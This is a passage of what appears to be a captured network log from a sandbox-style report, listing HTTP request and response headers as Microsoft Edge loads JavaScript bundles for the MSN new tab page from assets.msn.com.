accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: /AD2ZZQlXW+dDhlnN7z1hQ==
last-modified: Fri, 16 Dec 2022 21:57:09 GMT
etag: 0x8DADFB07AA60057
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 66bbb02d-301e-008f-7409-14d3d2000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612404,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e1f4
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/social-report-menu.eb3f75adfdccd43b5b0b.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/social-report-menu.eb3f75adfdccd43b5b0b.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: h0h0Cus0qAK5NBXirumK0Q==
last-modified: Fri, 16 Dec 2022 21:57:07 GMT
etag: 0x8DADFB0798725C0
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 4d91a038-101e-0061-7ab2-1364b8000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612528,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e270
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sports-card-wc.3d5af06df7fef5da78b3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sports-card-wc.3d5af06df7fef5da78b3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: v9Uc14k+bvgBAvVXQLgOnA==
last-modified: Tue, 20 Dec 2022 05:42:22 GMT
etag: 0x8DAE24CF765500A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 3b6f8178-901e-0079-545a-148c8b000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612634,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e2da
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sports-olympic-card-wc.98ce3fcd67b38099763f.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sports-olympic-card-wc.98ce3fcd67b38099763f.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: oJE6k3Um9Zyvm31xKYLmLg==
last-modified: Tue, 20 Dec 2022 23:56:01 GMT
etag: 0x8DAE2E5BF593DC2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 05981292-b01e-00bb-26c7-165ecb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612779,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e36b
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/sports-worldcup-card-wc.0b7341fe552fd4e31e77.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/sports-worldcup-card-wc.0b7341fe552fd4e31e77.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qSzMTPAmWpPRMwcY3/0KQA==
last-modified: Tue, 20 Dec 2022 05:42:20 GMT
etag: 0x8DAE24CF62C619B
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 621f9ac8-901e-0001-6d5a-14269a000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612841,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e3a9
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/spotlight-card-wc.584b25be3917b7234344.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/spotlight-card-wc.584b25be3917b7234344.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: qKD5ljPCBO7fIwk9XR7IMQ==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF4FA4FFB
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: a990f7d3-301e-00cb-225a-14accb000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612935,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e407
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/SSR-extension.9b9032f35dbb82e24944.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/SSR-extension.9b9032f35dbb82e24944.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: o/8TnPC9tjRz99/8KWrZYA==
last-modified: Tue, 20 Dec 2022 23:56:08 GMT
etag: 0x8DAE2E5C3B00E62
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 478d9e1e-001e-0044-0896-1a7281000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431612994,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=1, origin; dur=0 , cdntime; dur=1
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e442
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
Remote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/SSR-extension.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 2m6bMZWPM/3ZYoqga2Hjdw==
last-modified: Tue, 20 Dec 2022 23:56:05 GMT
etag: 0x8DAE2E5C1ED91B5
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: d1dbbc6c-001e-0104-7898-1afe4c000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: gzip
date: Sat, 31 Dec 2022 00:06:41 GMT
content-length: 359
akamai-request-bc: [a=88.221.24.111,b=431613026,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e462
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/story-carousel.047d14adc88c3d781627.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/story-carousel.047d14adc88c3d781627.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: T/K1SkkLdg5hrfqF0N+3Qg==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5C0323FF3
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 28017db6-701e-005b-2d36-1c4bbc000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431613090,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=24, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e4a2
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/super-nav.bdb4d4cd3be840de4bb0.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/super-nav.bdb4d4cd3be840de4bb0.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: AiKJBaXwprQIhM6oNieQ7Q==
last-modified: Tue, 20 Dec 2022 05:42:19 GMT
etag: 0x8DAE24CF604941E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 37788497-701e-0077-5f5a-142e96000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:41 GMT
akamai-request-bc: [a=88.221.24.111,b=431613687,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=19, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e6f7
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/superBreakingNews.1386cfe9a5c4cf5d87d9.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/superBreakingNews.1386cfe9a5c4cf5d87d9.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: jtVtiHsebgksVUv0RdLypQ==
last-modified: Tue, 20 Dec 2022 23:56:07 GMT
etag: 0x8DAE2E5C300AE2E
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 630fd04c-301e-00b3-1f35-1c06da000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431613750,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e736
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/tabbed-feed-wc.f3a6edc89edd4617494e.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/tabbed-feed-wc.f3a6edc89edd4617494e.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: Ats5m7uVIiEVFA02kVqS+A==
last-modified: Tue, 20 Dec 2022 23:56:04 GMT
etag: 0x8DAE2E5C1896051
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 82981d63-101e-005d-6863-16b1b0000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431613829,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e785
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/theme-picker-wc.8b7567876460f006feb3.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/theme-picker-wc.8b7567876460f006feb3.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: nAYgSP/sTcVhhzwJGNImgw==
last-modified: Fri, 16 Dec 2022 21:57:05 GMT
etag: 0x8DADFB0789E476C
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c4c592cf-801e-0034-5277-138081000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431613902,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=18, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e7ce
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/traffic-card-wc.e922db87c4071766aee4.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/traffic-card-wc.e922db87c4071766aee4.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: abFQuibZYPoyD5+ru74Lzw==
last-modified: Tue, 20 Dec 2022 05:42:18 GMT
etag: 0x8DAE24CF54AAE27
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: dd14ca15-901e-00c1-305c-14a2de000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431614022,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=25, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e846
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/travel-carousel.5ef3f88f8cf08cbd4645.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/travel-carousel.5ef3f88f8cf08cbd4645.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 3ppzsXVc5S/hEicd8VBd3g==
last-modified: Tue, 20 Dec 2022 23:56:02 GMT
etag: 0x8DAE2E5C05071E2
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: c47c81c4-e01e-009a-5d98-1ae4fa000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431614124,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e8ac
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/travel-destination.4c3824c77bdb27430d27.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/travel-destination.4c3824c77bdb27430d27.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: c3MNy52oq7T2+qJLH4dkbA==
last-modified: Tue, 20 Dec 2022 05:42:23 GMT
etag: 0x8DAE24CF8529A8A
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 2e82fcad-601e-0082-775a-140cc9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431614189,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=21, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9e8ed
access-control-allow-credentials: true
access-control-allow-origin: https://ntp.msn.com
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://deff.nelreports.net/api/report?cat=msn"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":0.25}
cache-control: public, no-transform, max-age=31535892
timing-allow-origin: *
vary: Origin
-
GEThttps://assets.msn.com/bundles/v1/edgeChromium/latest/trending-search-card.32e3ea83d79351d088ee.jsmsedge.exeRemote address:88.221.24.115:443RequestGET /bundles/v1/edgeChromium/latest/trending-search-card.32e3ea83d79351d088ee.js HTTP/2.0
host: assets.msn.com
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: */*
origin: https://ntp.msn.com
sec-fetch-site: same-site
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://ntp.msn.com/
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
ResponseHTTP/2.0 200
content-md5: 6kUGGFQoGZg96WgCzmRCZA==
last-modified: Fri, 16 Dec 2022 21:57:03 GMT
etag: 0x8DADFB077635D71
server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
x-ms-request-id: 33485acf-901e-0069-3eff-133ca9000000
x-ms-version: 2009-09-19
x-ms-lease-status: unlocked
x-ms-blob-type: BlockBlob
content-encoding: br
date: Sat, 31 Dec 2022 00:06:42 GMT
akamai-request-bc: [a=88.221.24.111,b=431614821,c=g,n=NL__AMSTERDAM,o=20940]
server-timing: clientrtt; dur=20, clienttt; dur=0, origin; dur=0 , cdntime; dur=0
akamai-cache-status: Hit from child
content-type: application/javascript
akamai-server-ip: 88.221.24.111
akamai-request-id: 19b9eb65
